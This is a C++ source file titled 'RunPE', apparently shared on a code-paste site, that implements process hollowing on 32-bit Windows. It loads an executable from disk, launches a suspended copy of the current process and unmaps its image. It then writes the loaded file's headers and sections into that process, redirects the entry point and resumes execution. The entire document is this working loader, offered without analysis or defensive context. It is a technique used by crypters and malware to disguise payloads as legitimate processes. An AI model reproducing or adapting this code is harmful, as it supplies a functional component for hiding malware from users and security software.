RunPE

1. #include <Windows.h>
2.  
3. typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
4.  
5. LPVOID FileToMem(LPCSTR szFileName)
6. {
7. HANDLE hFile;
8. DWORD dwRead;
9. DWORD dwSize;
10. LPVOID pBuffer = NULL;
11.  
12. hFile = CreateFileA(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
13. if (hFile)
14. {
15. dwSize = GetFileSize(hFile, NULL);
16. if (dwSize > 0)
17. {
18. pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
19. if (pBuffer)
20. {
21. SetFilePointer(hFile, NULL, NULL, FILE_BEGIN);
22. ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL);
23. }
24. }
25. CloseHandle(hFile);
26. }
27. return pBuffer;
28. }
29.  
30. void ExecFile(LPSTR szFilePath, LPVOID pFile)
31. {
32. PIMAGE_DOS_HEADER IDH;
33. PIMAGE_NT_HEADERS INH;
34. PIMAGE_SECTION_HEADER ISH;
35. PROCESS_INFORMATION PI;
36. STARTUPINFOA SI;
37. PCONTEXT CTX;
38. PDWORD dwImageBase;
39. NtUnmapViewOfSection xNtUnmapViewOfSection;
40. LPVOID pImageBase;
41. int Count;
42.  
43. IDH = PIMAGE_DOS_HEADER(pFile);
44. if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
45. {
46. INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
47. if (INH->Signature == IMAGE_NT_SIGNATURE)
48. {
49. RtlZeroMemory(&SI, sizeof(SI));
50. RtlZeroMemory(&PI, sizeof(PI));
51.  
52. if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
53. {
54. CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
55. CTX->ContextFlags = CONTEXT_FULL;
56. if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
57. {
58. ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
59.  
60. if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
61. {
62. xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
63. xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
64. }
65.  
66. pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
67. if (pImageBase)
68. {
69. WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
70. for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
71. {
72. ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
73. WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
74. }
75. WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
76. CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
77. SetThreadContext(PI.hThread, LPCONTEXT(CTX));
78. ResumeThread(PI.hThread);
79. }
80. }
81. }
82. }
83. }
84. VirtualFree(pFile, 0, MEM_RELEASE);
85. }
86.  
87. int main()
88. {
89. LPVOID pFile;
90. TCHAR szFilePath[1024];
91.  
92. pFile = FileToMem("C:\\2.exe");// give the adress to the file you want to //execute
93. if (pFile)
94. {
95. GetModuleFileNameA(0, LPSTR(szFilePath), 1024);
96. ExecFile(LPSTR(szFilePath), pFile);
97. }
98. return 0;
99. }